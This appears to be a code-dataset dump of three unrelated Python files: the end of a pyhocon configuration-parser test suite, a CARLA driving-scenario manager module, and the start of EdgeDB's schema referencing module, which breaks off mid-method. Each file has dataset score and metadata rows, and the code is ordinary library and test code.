def test_substitution_nested_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = <PASSWORD>
}
database {
name = ${?user}
pass = ${?pass}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == '<PASSWORD>'
def test_optional_with_merge(self):
unresolved = ConfigFactory.parse_string(
"""
foo: 42
foo: ${?a}
""", resolve=False)
source = ConfigFactory.parse_string(
"""
b: 14
""")
config = unresolved.with_fallback(source)
assert config['foo'] == 42
config = source.with_fallback(unresolved)
assert config['foo'] == 42
def test_fallback_with_resolve(self):
config3 = ConfigFactory.parse_string("c=5")
config2 = ConfigFactory.parse_string("b=${c}", resolve=False)
config1 = ConfigFactory.parse_string("a=${b}", resolve=False) \
.with_fallback(config2, resolve=False) \
.with_fallback(config3)
assert {'a': 5, 'b': 5, 'c': 5} == config1
def test_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
a = 45
b = ${?c}
d = ${?c} 4
e = ${?a}
g = ${?c1} ${?c2}
h = ${?c1} ${?c2} 1
""")
assert 'b' not in config
assert config['d'] == 4
assert config['e'] == 45
assert 'g' not in config
assert config['h'] == 1
def test_cascade_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
num = 3
retries_msg = You have ${num} retries
retries_msg = ${?CUSTOM_MSG}
""")
assert config == {
'num': 3,
'retries_msg': 'You have 3 retries'
}
def test_substitution_cycle(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
a = ${b}
b = ${c}
c = ${a}
""")
def test_assign_number_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
4
b = # test
# test2
5
c =
6
"""
)
assert config['a'] == 4
assert config['b'] == 5
assert config['c'] == 6
def test_assign_int(self):
config = ConfigFactory.parse_string(
"""
short = 12
long = 12321321837612378126213217321
negative = -15
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['short'] == 12
assert isinstance(config['short'], int)
assert config['long'] == 12321321837612378126213217321
assert isinstance(config['negative'], int)
assert config['negative'] == -15
def test_assign_float(self):
config = ConfigFactory.parse_string(
"""
a = 121.22
b = -121.22
c = .54
d = -.54
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['a'] == 121.22
assert config['b'] == -121.22
assert config['c'] == .54
assert config['d'] == -.54
def test_sci_real(self):
"""
Test scientific expression of number
"""
config = ConfigFactory.parse_string(
"""
short = 12.12321
long1 = 121.22E3423432
neg_long1 = 121.22E-1
long2 = 121.22e3423432
neg_long2 = 121.22e-3
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['short'] == 12.12321
assert config['long1'] == 121.22E3423432
assert config['neg_long1'] == 121.22E-1
assert config['long2'] == 121.22E3423432
assert config['neg_long2'] == 121.22E-3
def test_assign_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
"a"
b = # test
# test2
"b"
c =
"c"
"""
)
assert config['a'] == 'a'
assert config['b'] == 'b'
assert config['c'] == 'c'
def test_assign_list_numbers_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
1,
2,
]
b = # test
# test2
[
3,
4,]
c =
[
5,
6
]
"""
)
assert config['a'] == [1, 2]
assert config['b'] == [3, 4]
assert config['c'] == [5, 6]
def test_assign_list_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
"a",
"b",
]
b = # test
# test2
[
"c",
"d",]
c =
[
"e",
"f"
]
"""
)
assert config['a'] == ['a', 'b']
assert config['b'] == ['c', 'd']
assert config['c'] == ['e', 'f']
def test_assign_dict_strings_with_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
{
a: 1,
b: 2,
}
b = # test
# test2
{
c: 3,
d: 4,}
c =
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_assign_dict_strings_no_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a
{
a: 1,
b: 2,
}
b # test
# test2
{
c: 3,
d: 4,}
c
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = 123
a = ${?test}
a = 5
"""
)
assert config1['a'] == 5
config2 = ConfigFactory.parse_string(
"""
{
database {
host = "localhost"
port = 8000
url = ${database.host}":"${database.port}
}
database {
host = ${?DB_HOST}
}
database {
host = "other.host.net"
port = 433
}
}
"""
)
assert config2['database']['host'] == 'other.host.net'
assert config2['database']['port'] == 433
assert config2['database']['url'] == 'other.host.net:433'
def test_fallback_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = {
b: 1
c: 2
}
"""
)
config2 = ConfigFactory.parse_string(
"""
a.b = 4
a.d = 3
"""
)
config3 = config1.with_fallback(config2)
assert config3['a'] == {
'b': 1,
'c': 2,
'd': 3
}
config4 = ConfigFactory.parse_string(
"""
name: foo
"""
)
config5 = ConfigFactory.parse_string(
u"""
longName: "long "${?name}
""",
resolve=False
)
config6 = config4.with_fallback(config5)
assert config6 == {
'longName': 'long foo',
'name': 'foo'
}
def test_fallback_substitutions_overwrite_file(self):
config1 = ConfigFactory.parse_string(
"""
{
data-center-generic = { cluster-size: 8 }
misc = "mist"
}
"""
)
# use unicode path here for regression testing https://github.com/chimpler/pyhocon/issues/44
config2 = config1.with_fallback(u'samples/aws.conf')
assert config2 == {
'data-center-generic': {'cluster-size': 8},
'data-center-east': {'cluster-size': 8, 'name': 'east'},
'misc': 'mist',
'default-jvm-opts': ['-XX:+UseParNewGC'],
'large-jvm-opts': ['-XX:+UseParNewGC', '-Xm16g']
}
def test_fallback_self_ref_substitutions_append(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list = ${list} [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_fallback_self_ref_substitutions_append_plus_equals(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list += [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_self_merge_ref_substitutions_object(self):
config1 = ConfigFactory.parse_string(
"""
a : { }
b : 1
c : ${a} { d : [ ${b} ] }
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("c.d") == [1]
def test_self_merge_ref_substitutions_object2(self):
config1 = ConfigFactory.parse_string(
"""
x : { v1: 1 }
b1 : {v2: 2 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b2 : ${x} {v2: 3}
b += [${b2}]
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
b = merged.get("b")
assert len(b) == 2
assert b[0] == {'v2': 2}
assert b[1] == {'v1': 1, 'v2': 3}
def test_self_merge_ref_substitutions_object3(self):
config1 = ConfigFactory.parse_string(
"""
b1 : { v1: 1 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b1 : { v1: 2, v2: 3 }
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("b1") == {"v1": 2, "v2": 3}
b = merged.get("b")
assert len(b) == 1
assert b[0] == {"v1": 2, "v2": 3}
def test_fallback_self_ref_substitutions_merge(self):
config1 = ConfigFactory.parse_string(
"""
dict = { x: 1 }
"""
)
config2 = ConfigFactory.parse_string(
"""
dict = ${dict} { y: 2 }
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("dict") == {'x': 1, 'y': 2}
def test_fallback_self_ref_substitutions_concat_string(self):
config1 = ConfigFactory.parse_string(
"""
string = abc
"""
)
config2 = ConfigFactory.parse_string(
"""
string = ${string}def
""",
resolve=False
)
result = config2.with_fallback(config1)
assert result.get("string") == 'abcdef'
# test no mutation on config1
assert result is not config1
# test no mutation on config2
assert "abc" not in str(config2)
def test_fallback_non_root(self):
root = ConfigFactory.parse_string(
"""
a = 1
mid.b = 1
"""
)
config = root.get_config("mid").with_fallback(root)
assert config['a'] == 1 and config['b'] == 1
def test_object_field_substitution(self):
config = ConfigFactory.parse_string(
"""
A = ${Test}
Test {
field1 = 1
field2 = ${Test.field1}"2"
field3 = ${Test.field2}"3"
}
"""
)
assert config.get_string("A.field1") == "1"
assert config.get_string("A.field2") == "12"
assert config.get_string("A.field3") == "123"
assert config.get_string("Test.field1") == "1"
assert config.get_string("Test.field2") == "12"
assert config.get_string("Test.field3") == "123"
def test_one_line_quote_escape(self):
config = ConfigFactory.parse_string(
"""
test_no_quotes: abc\\n\\n
test_quotes: "abc\\n\\n"
"""
)
assert config == {
'test_no_quotes': 'abc\n\n',
'test_quotes': 'abc\n\n'
}
def test_multi_line_escape(self):
config = ConfigFactory.parse_string(
"""
with-escaped-backslash: \"\"\"
\\\\
\"\"\"
with-newline-escape-sequence: \"\"\"
\\n
\"\"\"
with-escaped-newline-escape-sequence: \"\"\"
\\\\n
\"\"\"
"""
)
assert config['with-escaped-backslash'] == '\n\\\\\n'
assert config['with-newline-escape-sequence'] == '\n\\n\n'
assert config['with-escaped-newline-escape-sequence'] == '\n\\\\n\n'
def test_multiline_with_backslash(self):
config = ConfigFactory.parse_string(
"""
test = line1 \
line2
test2 = test
""")
assert config == {
'test': 'line1 line2',
'test2': 'test'
}
def test_from_dict_with_dict(self):
d = {
'banana': 3,
'apple': 4,
'pear': 1,
'orange': 2,
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_ordered_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['orange'] = 2
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_nested_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['tree'] = {
'a': 'abc\ntest\n',
'b': [1, 2, 3]
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_object_concat(self):
config = ConfigFactory.parse_string(
"""o1 = {
foo : {
a : 1
b : 2
}
}
o2 = {
foo : {
b : 3
c : 4
}
}
o3 = ${o1} ${o2}
"""
)
assert config.get_int('o1.foo.b') == 2
assert config.get_int('o2.foo.b') == 3
assert config.get_int('o3.foo.b') == 3
assert config.get_int('o1.foo.c', default=42) == 42
assert config.get_int('o3.foo.a') == 1
assert config.get_int('o3.foo.c') == 4
def test_issue_75(self):
config = ConfigFactory.parse_string(
"""base : {
bar: ["a"]
}
sub : ${base} {
baz: ${base.bar} ["b"]
}
sub2: ${sub}
"""
)
assert config.get_list('base.bar') == ["a"]
assert config.get_list('sub.baz') == ["a", "b"]
assert config.get_list('sub2.baz') == ["a", "b"]
def test_plain_ordered_dict(self):
config = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
with pytest.raises(ConfigException):
config.as_plain_ordered_dict()
def test_quoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
no_trailing_ws = "foo" "bar "
trailing_ws = "foo" "bar "{ws}
trailing_ws_with_comment = "foo" "bar "{ws}// comment
""".format(ws=' '))
assert config == {
'no_trailing_ws': "foo bar ",
'trailing_ws': "foo bar ",
'trailing_ws_with_comment': "foo bar "
}
def test_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo bar
""")
assert config == {
'a': 'foo bar'
}
def test_quoted_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo "bar" dummy
""")
assert config == {
'a': 'foo bar dummy'
}
def test_quoted_unquoted_strings_with_ws_substitutions(self):
config = ConfigFactory.parse_string(
"""
x = 5
b = test
a = foo "bar" ${b} dummy
c = foo ${x} bv
d = foo ${x} 43
""")
assert config == {
'x': 5,
'b': 'test',
'a': 'foo bar test dummy',
'c': 'foo 5 bv',
'd': 'foo 5 43'
}
def test_complex_substitutions(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: ${c} {
pa: [${a}]
pb: ${b.pa}
}
c: { }
d: { pc: ${b.pa} }
e: ${b}
""", resolve=True)
assert config == {
'a': 1,
'b': {'pa': [1], 'pb': [1]},
'c': {},
'd': {'pc': [1]},
'e': {'pa': [1], 'pb': [1]}
}
def test_assign_next_line(self):
config = ConfigFactory.parse_string(
"""
a = // abc
abc
c =
5
""")
assert config == {
'a': 'abc',
'c': 5
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment(self):
config = ConfigFactory.parse_string(
"""
string_from_env = ${STRING_VAR}
""")
assert config == {
'string_from_env': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref_optional(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${?STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, TRUE_OR_FALSE='false')
def test_bool_from_environment(self):
config = ConfigFactory.parse_string(
"""
bool_from_env = ${TRUE_OR_FALSE}
""")
assert config == {
'bool_from_env': 'false'
}
assert config.get_bool('bool_from_env') is False
@mock.patch.dict(os.environ, INT_VAR='5')
def test_int_from_environment(self):
config = ConfigFactory.parse_string(
"""
int_from_env = ${INT_VAR}
""")
assert config == {
'int_from_env': '5'
}
assert config.get_int('int_from_env') == 5
def test_unicode_dict_key(self):
input_string = u"""
www.sample.com {
us {
name = "first domain"
}
}
www.example-ö.com {
us {
name = "second domain"
}
}
"""
config = ConfigFactory.parse_string(input_string)
assert config.get_string(u'www.sample.com.us.name') == 'first domain'
assert config.get_string(u'www.example-ö.com.us.name') == 'second domain'
with pytest.raises(ConfigWrongTypeException):
config.put(u'www.example-ö', 'append_failure', append=True)
with pytest.raises(ConfigMissingException):
config.get_string(u'missing_unicode_key_ö')
with pytest.raises(ConfigException):
config.get_bool(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_list(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_config(u'www.example-ö.com.us.name')
with pytest.raises(ConfigWrongTypeException):
config.get_string(u'www.example-ö.com.us.name.missing')
def test_with_comment_on_last_line(self):
# Adress issue #102
config_tree = ConfigFactory.parse_string("""
foo: "1"
bar: "2"
# DO NOT CHANGE ANY OF THE ABOVE SETTINGS!""")
assert config_tree == {
'foo': '1',
'bar': '2'
}
def test_triple_quotes_same_line(self):
config_tree = ConfigFactory.parse_string('a:["""foo"""", "bar"]')
assert config_tree == {
'a': ['foo"', "bar"]
}
def test_pop(self):
config_tree = ConfigFactory.parse_string('a:{b: 3, d: 6}')
assert 3 == config_tree.pop('a.b', 5)
assert 5 == config_tree.pop('a.c', 5)
expected = {
'a': {'d': 6}
}
assert expected == config_tree
def test_merge_overriden(self):
# Adress issue #110
# ConfigValues must merge with its .overriden_value
# if both are ConfigTree
config_tree = ConfigFactory.parse_string("""
foo: ${bar}
foo: ${baz}
bar: {r: 1, s: 2}
baz: {s: 3, t: 4}
""")
assert 'r' in config_tree['foo'] and 't' in config_tree['foo'] and config_tree['foo']['s'] == 3
def test_attr_syntax(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: {
pb: 5
}
""")
assert 5 == config.b.pb
def test_escape_quote(self):
config = ConfigFactory.parse_string(
"""
quoted: "abc\\"test"
unquoted: abc\\"test
""")
assert 'abc"test' == config['quoted']
assert 'abc"test' == config['unquoted']
def test_escape_quote_complex(self):
config = ConfigFactory.parse_string(
"""
value: "{\\"critical\\":\\"0.00\\",\\"warning\\":\\"99.99\\"}"
"""
)
assert '{"critical":"0.00","warning":"99.99"}' == config['value']
def test_keys_with_slash(self):
config = ConfigFactory.parse_string(
"""
/abc/cde1: abc
"/abc/cde2": "cde"
/abc/cde3: "fgh"
""")
assert 'abc' == config['/abc/cde1']
assert 'cde' == config['/abc/cde2']
assert 'fgh' == config['/abc/cde3']
def test_mutation_values(self):
config = ConfigFactory.parse_string(
"""
common : {
}
b1 = []
var = "wrong"
compilerCommon : ${common} {
VAR : ${var}
}
substrate-suite: {
VAR : "right"
}
b1 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
b2 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
""")
assert config.get("b1")[1]['VAR'] == 'right'
assert config.get("b2")[1]['VAR'] == 'right'
def test_escape_sequences_json_equivalence(self):
"""
Quoted strings are in the same format as JSON strings,
See: https://github.com/lightbend/config/blob/master/HOCON.md#unchanged-from-json
"""
source = r"""
{
"plain-backslash": "\\",
"tab": "\t",
"no-tab": "\\t",
"newline": "\n",
"no-newline": "\\n",
"cr": "\r",
"no-cr": "\\r",
"windows": "c:\\temp"
}
"""
expected = {
'plain-backslash': '\\',
'tab': '\t',
'no-tab': '\\t',
'newline': '\n',
'no-newline': '\\n',
'cr': '\r',
'no-cr': '\\r',
'windows': 'c:\\temp',
}
config = ConfigFactory.parse_string(source)
assert config == expected
assert config == json.loads(source)
try:
from dateutil.relativedelta import relativedelta
@pytest.mark.parametrize('data_set', [
('a: 1 months', relativedelta(months=1)),
('a: 1months', relativedelta(months=1)),
('a: 2 month', relativedelta(months=2)),
('a: 3 mo', relativedelta(months=3)),
('a: 3mo', relativedelta(months=3)),
('a: 3 mon', '3 mon'),
('a: 1 years', relativedelta(years=1)),
('a: 1years', relativedelta(years=1)),
('a: 2 year', relativedelta(years=2)),
('a: 3 y', relativedelta(years=3)),
('a: 3y', relativedelta(years=3)),
])
def test_parse_string_with_duration_optional_units(data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
except Exception:
pass
| 2.453125 | 2 |
scenario_runner/srunner/scenariomanager/scenario_manager.py | cgeller/WorldOnRails | 447 | 3458 | <reponame>cgeller/WorldOnRails<gh_stars>100-1000
#!/usr/bin/env python
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides the ScenarioManager implementation.
It must not be modified and is for reference only!
"""
from __future__ import print_function
import sys
import time
import py_trees
from srunner.autoagents.agent_wrapper import AgentWrapper
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
from srunner.scenariomanager.result_writer import ResultOutputProvider
from srunner.scenariomanager.timer import GameTime
from srunner.scenariomanager.watchdog import Watchdog
class ScenarioManager(object):
"""
Basic scenario manager class. This class holds all functionality
required to start, and analyze a scenario.
The user must not modify this class.
To use the ScenarioManager:
1. Create an object via manager = ScenarioManager()
2. Load a scenario via manager.load_scenario()
3. Trigger the execution of the scenario manager.run_scenario()
This function is designed to explicitly control start and end of
the scenario execution
4. Trigger a result evaluation with manager.analyze_scenario()
5. If needed, cleanup with manager.stop_scenario()
"""
def __init__(self, debug_mode=False, sync_mode=False, timeout=2.0):
"""
Setups up the parameters, which will be filled at load_scenario()
"""
self.scenario = None
self.scenario_tree = None
self.scenario_class = None
self.ego_vehicles = None
self.other_actors = None
self._debug_mode = debug_mode
self._agent = None
self._sync_mode = sync_mode
self._running = False
self._timestamp_last_run = 0.0
self._timeout = timeout
self._watchdog = Watchdog(float(self._timeout))
self.scenario_duration_system = 0.0
self.scenario_duration_game = 0.0
self.start_system_time = None
self.end_system_time = None
def _reset(self):
"""
Reset all parameters
"""
self._running = False
self._timestamp_last_run = 0.0
self.scenario_duration_system = 0.0
self.scenario_duration_game = 0.0
self.start_system_time = None
self.end_system_time = None
GameTime.restart()
def cleanup(self):
"""
This function triggers a proper termination of a scenario
"""
if self.scenario is not None:
self.scenario.terminate()
if self._agent is not None:
self._agent.cleanup()
self._agent = None
CarlaDataProvider.cleanup()
def load_scenario(self, scenario, agent=None):
"""
Load a new scenario
"""
self._reset()
self._agent = AgentWrapper(agent) if agent else None
if self._agent is not None:
self._sync_mode = True
self.scenario_class = scenario
self.scenario = scenario.scenario
self.scenario_tree = self.scenario.scenario_tree
self.ego_vehicles = scenario.ego_vehicles
self.other_actors = scenario.other_actors
# To print the scenario tree uncomment the next line
# py_trees.display.render_dot_tree(self.scenario_tree)
if self._agent is not None:
self._agent.setup_sensors(self.ego_vehicles[0], self._debug_mode)
def run_scenario(self):
"""
Trigger the start of the scenario and wait for it to finish/fail
"""
print("ScenarioManager: Running scenario {}".format(self.scenario_tree.name))
self.start_system_time = time.time()
start_game_time = GameTime.get_time()
self._watchdog.start()
self._running = True
while self._running:
timestamp = None
world = CarlaDataProvider.get_world()
if world:
snapshot = world.get_snapshot()
if snapshot:
timestamp = snapshot.timestamp
if timestamp:
self._tick_scenario(timestamp)
self._watchdog.stop()
self.cleanup()
self.end_system_time = time.time()
end_game_time = GameTime.get_time()
self.scenario_duration_system = self.end_system_time - \
self.start_system_time
self.scenario_duration_game = end_game_time - start_game_time
if self.scenario_tree.status == py_trees.common.Status.FAILURE:
print("ScenarioManager: Terminated due to failure")
def _tick_scenario(self, timestamp):
"""
Run next tick of scenario and the agent.
If running synchornously, it also handles the ticking of the world.
"""
if self._timestamp_last_run < timestamp.elapsed_seconds and self._running:
self._timestamp_last_run = timestamp.elapsed_seconds
self._watchdog.update()
if self._debug_mode:
print("\n--------- Tick ---------\n")
# Update game time and actor information
GameTime.on_carla_tick(timestamp)
CarlaDataProvider.on_carla_tick()
if self._agent is not None:
ego_action = self._agent()
# Tick scenario
self.scenario_tree.tick_once()
if self._debug_mode:
print("\n")
py_trees.display.print_ascii_tree(self.scenario_tree, show_status=True)
sys.stdout.flush()
if self.scenario_tree.status != py_trees.common.Status.RUNNING:
self._running = False
if self._agent is not None:
self.ego_vehicles[0].apply_control(ego_action)
if self._sync_mode and self._running and self._watchdog.get_status():
CarlaDataProvider.get_world().tick()
def get_running_status(self):
"""
returns:
bool: False if watchdog exception occured, True otherwise
"""
return self._watchdog.get_status()
def stop_scenario(self):
"""
This function is used by the overall signal handler to terminate the scenario execution
"""
self._running = False
def analyze_scenario(self, stdout, filename, junit):
"""
This function is intended to be called from outside and provide
the final statistics about the scenario (human-readable, in form of a junit
report, etc.)
"""
failure = False
timeout = False
result = "SUCCESS"
if self.scenario.test_criteria is None:
print("Nothing to analyze, this scenario has no criteria")
return True
for criterion in self.scenario.get_criteria():
if (not criterion.optional and
criterion.test_status != "SUCCESS" and
criterion.test_status != "ACCEPTABLE"):
failure = True
result = "FAILURE"
elif criterion.test_status == "ACCEPTABLE":
result = "ACCEPTABLE"
if self.scenario.timeout_node.timeout and not failure:
timeout = True
result = "TIMEOUT"
output = ResultOutputProvider(self, result, stdout, filename, junit)
output.write()
return failure or timeout
| 2.671875 | 3 |
edb/schema/referencing.py | disfated/edgedb | 0 | 3459 | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import hashlib
from edb import errors
from edb.common import struct
from edb.edgeql import ast as qlast
from . import delta as sd
from . import inheriting
from . import objects as so
from . import schema as s_schema
from . import name as sn
from . import utils
ReferencedT = TypeVar('ReferencedT', bound='ReferencedObject')
ReferencedInheritingObjectT = TypeVar('ReferencedInheritingObjectT',
bound='ReferencedInheritingObject')
class ReferencedObject(so.DerivableObject):
#: True if the object has an explicit definition and is not
#: purely inherited.
is_local = so.SchemaField(
bool,
default=False,
inheritable=False,
compcoef=0.909,
reflection_method=so.ReflectionMethod.AS_LINK,
)
def get_subject(self, schema: s_schema.Schema) -> Optional[so.Object]:
# NB: classes that inherit ReferencedObject define a `get_subject`
# method dynamically, with `subject = SchemaField`
raise NotImplementedError
def get_referrer(self, schema: s_schema.Schema) -> Optional[so.Object]:
return self.get_subject(schema)
def delete(self, schema: s_schema.Schema) -> s_schema.Schema:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.DeleteObject, type(self))
cmd = cmdcls(classname=self.get_name(schema))
context = sd.CommandContext(
modaliases={},
schema=schema,
disable_dep_verification=True,
)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self)
parent_cmd.add(cmd)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
schema = delta.apply(schema, context)
return schema
def derive_ref(
self: ReferencedT,
schema: s_schema.Schema,
referrer: so.QualifiedObject,
*qualifiers: str,
mark_derived: bool = False,
attrs: Optional[Dict[str, Any]] = None,
dctx: Optional[sd.CommandContext] = None,
derived_name_base: Optional[str] = None,
inheritance_merge: bool = True,
preserve_path_id: Optional[bool] = None,
refdict_whitelist: Optional[AbstractSet[str]] = None,
transient: bool = False,
name: Optional[str] = None,
**kwargs: Any,
) -> Tuple[s_schema.Schema, ReferencedT]:
if name is None:
derived_name: str = self.get_derived_name(
schema, referrer, *qualifiers,
mark_derived=mark_derived,
derived_name_base=derived_name_base)
else:
derived_name = name
if self.get_name(schema) == derived_name:
raise errors.SchemaError(
f'cannot derive {self!r}({derived_name}) from itself')
derived_attrs: Dict[str, object] = {}
if attrs is not None:
derived_attrs.update(attrs)
derived_attrs['name'] = derived_name
derived_attrs['bases'] = so.ObjectList.create(
schema, [self])
mcls = type(self)
referrer_class = type(referrer)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for_name(schema, derived_name)
refcoll = referrer.get_field_value(schema, refdict.attr)
existing = refcoll.get(schema, refname, default=None)
if existing is not None:
cmdcls: Type[sd.Command] = \
sd.ObjectCommandMeta.get_command_class_or_die(sd.AlterObject,
type(self))
else:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.CreateObject, type(self))
cmd = cmdcls(classname=derived_name)
for k, v in derived_attrs.items():
cmd.set_attribute_value(k, v)
if existing is not None:
new_bases = derived_attrs['bases']
old_bases = existing.get_bases(schema)
if new_bases != old_bases:
assert isinstance(new_bases, so.ObjectList)
removed_bases, added_bases = inheriting.delta_bases(
[b.get_name(schema) for b in old_bases.objects(schema)],
[b.get_name(schema) for b in new_bases.objects(schema)],
)
rebase_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
inheriting.RebaseInheritingObject, type(self))
rebase_cmd = rebase_cmdcls(
classname=derived_name,
added_bases=added_bases,
removed_bases=removed_bases,
)
cmd.add(rebase_cmd)
context = sd.CommandContext(
modaliases={},
schema=schema,
)
assert isinstance(cmd, sd.ObjectCommand)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self, referrer=referrer)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
if not inheritance_merge:
context.current().inheritance_merge = False
if refdict_whitelist is not None:
context.current().inheritance_refdicts = refdict_whitelist
if mark_derived:
context.current().mark_derived = True
if transient:
context.current().transient_derivation = True
if preserve_path_id:
context.current().preserve_path_id = True
parent_cmd.add(cmd)
schema = delta.apply(schema, context)
derived: ReferencedT = schema.get(derived_name)
return schema, derived
def get_verbosename(
self,
schema: s_schema.Schema,
*,
with_parent: bool = False,
) -> str:
vn = super().get_verbosename(schema)
if with_parent:
subject = self.get_subject(schema)
if subject is not None:
pn = subject.get_verbosename(schema, with_parent=True)
return f'{vn} of {pn}'
return vn
class ReferencedInheritingObject(
so.DerivableInheritingObject,
ReferencedObject,
):
# Indicates that the object has been declared as
# explicitly inherited.
declared_overloaded = so.SchemaField(
bool,
default=False,
compcoef=None,
introspectable=False,
inheritable=False,
ephemeral=True,
)
def get_implicit_bases(
self: ReferencedInheritingObjectT,
schema: s_schema.Schema,
) -> List[ReferencedInheritingObjectT]:
return [
b for b in self.get_bases(schema).objects(schema)
if not b.generic(schema)
]
class ReferencedObjectCommandMeta(sd.ObjectCommandMeta):
_transparent_adapter_subclass: ClassVar[bool] = True
_referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None
def __new__(mcls,
name: str,
bases: Tuple[type, ...],
clsdct: Dict[str, Any],
*,
referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None,
**kwargs: Any
) -> ReferencedObjectCommandMeta:
cls = super().__new__(mcls, name, bases, clsdct, **kwargs)
assert isinstance(cls, ReferencedObjectCommandMeta)
if referrer_context_class is not None:
cls._referrer_context_class = referrer_context_class
return cls
class ReferencedObjectCommandBase(
sd.QualifiedObjectCommand[ReferencedT],
metaclass=ReferencedObjectCommandMeta,
):
@classmethod
def get_referrer_context_class(
cls,
) -> Type[sd.ObjectCommandContext[so.Object]]:
if cls._referrer_context_class is None:
raise TypeError(
f'referrer_context_class is not defined for {cls}')
return cls._referrer_context_class
@classmethod
def get_referrer_context(
cls,
context: sd.CommandContext,
) -> Optional[sd.ObjectCommandContext[so.Object]]:
"""Get the context of the command for the referring object, if any.
E.g. for a `create/alter/etc concrete link` command this would
be the context of the `create/alter/etc type` command.
"""
ctxcls = cls.get_referrer_context_class()
ctx = context.get(ctxcls) # type: ignore
return cast(Optional[sd.ObjectCommandContext[so.Object]], ctx)
@classmethod
def get_referrer_context_or_die(
cls,
